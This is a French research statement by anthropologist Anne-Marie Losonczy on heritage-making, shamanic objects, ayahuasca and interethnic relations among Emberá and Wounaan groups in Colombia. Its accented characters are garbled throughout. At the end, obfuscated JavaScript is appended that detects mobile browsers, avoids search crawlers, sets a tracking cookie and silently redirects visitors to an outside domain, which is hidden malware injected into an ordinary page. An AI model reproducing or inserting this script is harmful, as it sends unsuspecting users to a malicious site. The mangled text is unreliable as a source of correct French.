Anne-Marie LOSONCZY

Anne-Marie LOSONCZY, directrice d’A�tude (EPHE), anthropologue (CERMA)

Conflits, A�checs et A�A�changes dans les processus de patrimonialisationA�: la dimension interethnique.

Mes recherches portent sur les sociA�tA�s emberA� et wounaan du -Choco et du Cauca (occident colombien), vivant dans un environnementA� interethnique historique avec des groupes de descendants da��esclaves africains, ainsi que sur des groupes emberA� dA�placA�s par la violence insurrectionnelle dans la villeA� de BogotA� et propulsA�s ainsi dans un nouvel environnement interA�thnique composA� da��autres groupes indiens en voie da��urbanisation ( surtout Wuitoto, Muisca A� BogotA� ) et da��habitants urbains mA�tis.

Ces sociA�tA�s sont caractA�risA�es de longue date par une fragmentation dialectale, une forte mobilitA� intra et inter-rA�gionale, un systA?me chamanique reprA�sentA� comme fonciA?rement ambivalent et crA�ateur de scissions internes, A�et une production de longue date de vannerie, colliers, bA?tons, bancs chamaniques sculptA�s et de graphisme corporel, ainsi que de chants chamaniques, tous historiquement marquA�s par diverses influences culturelles extra-ethniques. Leurs objets sculptA�s collectA�s par des anthropologues figurent depuis longtemps dans les musA�es nationaux et internationaux.

RA�gimes da��historicitA�, reprA�sentation du soi et demande de patrimonialisation

Ja��ai pu montrer dans des travaux antA�rieurs que chez les EmberA� la construction des rA�cits mythiques traditionnels de caractA?re historique (guerres avec les Cunas, contacts avec les missionnaires et les groupes noirs) reprA�sente la sA�quantialitA� temporelle par une simultanA�itA� spatialeA�: tout arrive dans une temporalitA� indA�finie et simultanA�e projetA�e sur divers lieux du territoire emberA�, lieux de contacts guerriers, nA�gociA�s ou esquivA�s. La��inculcation rA�cente da��une lecture tA�lA�ologique et da��une temporalitA� linA�aire de leur histoire ou les contacts apparaissent tous comme oppressifs et meurtriers semble avoir fait A�merger une vision plus victimaire du soi collectif, renforcA�e par la violence insurrectionnelle multiforme qui les affecte aujourda��hui. ParallA?lement, une politique de contrA?le, mise au pas et sanction est dA�ployA�e par les jeunes leaders desA�cabildo emberA�, face aux chamans et leurs rituels, soupconnA�s de sorcellerie et perA�us, soit comme dangereux, soit comme inefficaces, devant les menaces de violence armA�e et de A�maladies attribuA�es aux nouveaux contacts. La��un des effets deA� cette dA�lA�gitimation est la suppression du monopole de fabrication de bancs, bA?tons et colliers chamaniques par des chamans qui dA�tache leur production, animation et circulation du contexte rituel. DA�sormais, les techniques de production de ces objetsA� sont enseignA�esA� A� la��A�cole ou dans des ateliers pour adultes A� des fins de vente A� la��extA�rieur. Par ailleurs, la migration emberA� A�vers les villes, la mendicitA� et A�la paupA�risation urbaines, ainsi que de rA�centes vagues de suicides de jeunes EmberA� en milieu rural et urbain A�projettent leur image dans les mA�dia nationaux comme celle da��A�A�IndigA?nes dA�placA�sA�A� , ou da�� A�A�IndigA?nes mendiantsA�A�, A�les situant au bas de la��A�chelle dans la hiA�rarchisation A�mergente des sociA�tA�s indiennes,A� autant du point de vueA� des institutions que de celui de groupes indiens proches. La convergence de ces facteurs semble faire obstacle aux demandes de musA�ification, A�manant de certains cabildos, da��objets rituels figuratifs ou ornementaux (sculptures, vanneries, colliers) rA�cemment fabriquA�s, car ils sont paralA?llement pensA�s et traitA�s par ces groupes commeA� a�?artesaniasa�� A�et A�vendus aux carrefours et marchA�s des villes colombiennes.

Je voudrais interroger cet A�chec de patrimonialisation A� la lumiA?re de la transformation du langage formel et stylistique, A�du mode da��apprentissage et de fabrication et la fonction des objets fabriquA�s par leur dA�tachement du contexte rituel chamanique. MaisA� cet A�chec permet aussi A�de mettre A� jour la��impact A�des politiques multi-culturelles de la mA�moire culturelle sur la��A�mergence de nouvelles hiA�rarchies ethniques dont les succA?s et A�checs de patrimonialisation ma��apparaissent comme des analyseurs privilA�giA�s.

Conflits et A�changes dans le champ patrimonialA�: effets patrimoniaux et nouveaux rA�gimes interethniques

A� travers une A�tude de cas, je voudrais tester la��hypothA?se que conflits et A�changes autour de la patrimonialisation de da��objets matA�riels et immatA�riels en sont venus A� constituer un idiome dans lequel se reformulent de nouvelles relations interA�thniques entre groupes minoritaires, relations mA�diatisA�s par des nouveaux supportsA� de conservation et diffusion. Les rapports sociaux intra et inter-A�thniques se reconfigurent autour des effets de patrimonialisation comme le remaniement des catA�gories locales da��A�phA?mA?re et de pA�renne, de matA�riel et da��immatA�riel et la fragmentation da��ensembles culturels articulA�s en pratiques ou objets A� patrimonialiser. Le processus patrimonial instaure un nouveau rapport entre religion et savoir, entre circulation da��objets et pratiques et/ou A�leur patrimonialisation. Ces effets suscitent divisions et conflits, souvent manifestA�es par des accusations de sorcellerie, ainsi que de nouvelles hiA�rarchies entre groupes que la lA�gislation multiculturelle postule pourtant de statut rigoureusement A�gal. A�Mais ils peuvent A�galement conduire A� la��A�mergence de nouvelles alliances inter-A�thniques, notamment entre groupes en voie da��urbanisation, autour da��un A�change de rituels ou da��objets A� patrimonialiser offrant un surplus de lA�gitimitA� aux deux groupes.

Ja��explorerai en particulier le rA�gime da��alternance entre conflit et A�change dans le champ interA�thnique autour des tentatives concurrentes de patrimonialisation de la dA�coction vA�gA�tale amazonienne de la��ayahuasca (appelle a�?yajA�a��) avec les rituels chamaniques mA�diateurs, ou la production, circulation, ritualisation et usage du a�?yajA�a�� devient un enjeu patrimonial entre la��Etat et sa politique de contrA?le des A�A�droguesA�A�, des consommateurs urbains de milieux mA�dical, artistique, intellectuel et acadA�mique globalisA�s et des groupes et chamans indiens alternant concurrence et alliances.

Le rA?le pivot des rituels, A� la fois comme supports et objets de patrimonialisation entre matA�riel et immatA�rielA� sera le fil da��Ariane de la recherche.

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}